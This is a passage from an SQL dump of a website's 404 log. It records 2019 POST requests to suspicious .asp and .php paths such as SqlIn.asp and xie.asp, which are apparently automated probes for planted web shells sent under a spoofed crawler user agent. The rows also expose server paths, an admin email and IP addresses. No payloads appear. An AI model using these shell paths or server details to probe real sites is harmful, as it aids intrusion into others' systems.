15:20:08',35269200,37072504,'http://bintara.com.my//images/temp/SqlIn.asp',1,0,'222.205.197.150'),(28974,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//images/temp/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.62.224.83\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.62.224.83\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/images/temp/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBIf5cHc@dX2BdZ47JGAAAAAw\";s:12:\"REDIRECT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"54974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/images/temp/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBIf5cHc@dX2BdZ47JGAAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930401.9005\";s:12:\"REQUEST_TIME\";s:10:\"1571930401\";}}','notice','2019-10-24 15:20:06','2019-10-24 15:20:03',35846064,37647352,'http://bintara.com.my//images/temp/SqlIn.asp',1,0,'222.62.224.83'),(28973,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//space/css/xie.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.233.249.217\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.233.249.217\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/space/css/xie.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/space/css/xie.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBD92Cd74l7secq5l1UQAAAUM\";s:12:\"REDIRECT_URL\";s:18:\"/space/css/xie.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"54395\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/space/css/xie.asp\";s:10:\"SCRIPT_URL\";s:18:\"/space/css/xie.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBD92Cd74l7secq5l1UQAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930383.8566\";s:12:\"REQUEST_TIME\";s:10:\"1571930383\";}}','notice','2019-10-24 15:19:46','2019-10-24 15:19:44',35272560,37076392,'http://bintara.com.my//space/css/xie.asp',1,0,'61.233.249.217'),(28972,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//space/css/xie.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.237.253.156\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.237.253.156\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/space/css/xie.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/space/css/xie.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBBd2Cd74l7secq5l1TwAAAUE\";s:12:\"REDIRECT_URL\";s:18:\"/space/css/xie.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"54149\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/space/css/xie.asp\";s:10:\"SCRIPT_URL\";s:18:\"/space/css/xie.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBBd2Cd74l7secq5l1TwAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930373.6861\";s:12:\"REQUEST_TIME\";s:10:\"1571930373\";}}','notice','2019-10-24 15:19:35','2019-10-24 15:19:34',35342272,37149496,'http://bintara.com.my//space/css/xie.asp',1,0,'61.237.253.156'),(28971,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Down/jszx/ken.phP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.104.78.20\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.104.78.20\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/ken.phP\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Down/jszx/ken.phP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHAk92Cd74l7secq5l1NwAAAUg\";s:12:\"REDIRECT_URL\";s:18:\"/Down/jszx/ken.phP\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"51757\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/ken.phP\";s:10:\"SCRIPT_URL\";s:18:\"/Down/jszx/ken.phP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHAk92Cd74l7secq5l1NwAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571930259.268\";s:12:\"REQUEST_TIME\";s:10:\"1571930259\";}}','notice','2019-10-24 15:17:42','2019-10-24 15:17:39',35659688,37458552,'http://bintara.com.my//Down/jszx/ken.phP',1,0,'218.104.78.20'),(28970,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Down/jszx/lan.Php\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.163.112.51\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.163.112.51\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/lan.Php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Down/jszx/lan.Php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHAekq-QPicCh3WFsYm3QAAAIE\";s:12:\"REDIRECT_URL\";s:18:\"/Down/jszx/lan.Php\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"51388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/lan.Php\";s:10:\"SCRIPT_URL\";s:18:\"/Down/jszx/lan.Php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHAekq-QPicCh3WFsYm3QAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930234.4443\";s:12:\"REQUEST_TIME\";s:10:\"1571930234\";}}','notice','2019-10-24 15:17:16','2019-10-24 15:17:14',35271320,37072256,'http://bintara.com.my//Down/jszx/lan.Php',1,0,'211.163.112.51'),(28969,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Down/jszx/lan.Php\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.241.205.160\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.241.205.160\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/lan.Php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Down/jszx/lan.Php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHAZUq-QPicCh3WFsYm1QAAAJc\";s:12:\"REDIRECT_URL\";s:18:\"/Down/jszx/lan.Php\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"50688\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Down/jszx/lan.Php\";s:10:\"SCRIPT_URL\";s:18:\"/Down/jszx/lan.Php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHAZUq-QPicCh3WFsYm1QAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930213.3997\";s:12:\"REQUEST_TIME\";s:10:\"1571930213\";}}','notice','2019-10-24 15:16:55','2019-10-24 15:16:53',35264040,37067944,'http://bintara.com.my//Down/jszx/lan.Php',1,0,'61.241.205.160'),(28968,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Public/congci.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.29.208.173\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.29.208.173\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Public/congci.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Public/congci.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHAXkq-QPicCh3WFsYm0QAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/Public/congci.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"50688\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Public/congci.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Public/congci.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHAXkq-QPicCh3WFsYm0QAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571930206.732\";s:12:\"REQUEST_TIME\";s:10:\"1571930206\";}}','notice','2019-10-24 15:16:48','2019-10-24 15:16:47',35270024,37069504,'http://bintara.com.my//Public/congci.asp',1,0,'61.29.208.173'),(28967,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Public/congci.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"203.132.35.3\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"203.132.35.3\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Public/congci.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Public/congci.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHATkq-QPicCh3WFsYmyQAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/Public/congci.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"50067\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Public/congci.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Public/congci.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHATkq-QPicCh3WFsYmyQAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930190.5174\";s:12:\"REQUEST_TIME\";s:10:\"1571930190\";}}','notice','2019-10-24 15:16:32','2019-10-24 15:16:30',35343520,37144320,'http://bintara.com.my//Public/congci.asp',1,0,'203.132.35.3'),(28966,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/tdy/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.139.108.129\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.139.108.129\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/tdy/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/tdy/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHAPUq-QPicCh3WFsYmvwAAAJU\";s:12:\"REDIRECT_URL\";s:21:\"/images/tdy/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"49696\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/tdy/testp.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/tdy/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHAPUq-QPicCh3WFsYmvwAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930173.5672\";s:12:\"REQUEST_TIME\";s:10:\"1571930173\";}}','notice','2019-10-24 15:16:15','2019-10-24 15:16:13',35265704,37063416,'http://bintara.com.my//images/tdy/testp.asp',1,0,'61.139.108.129'),(28965,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//cjcx/mipingyi.AsP\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 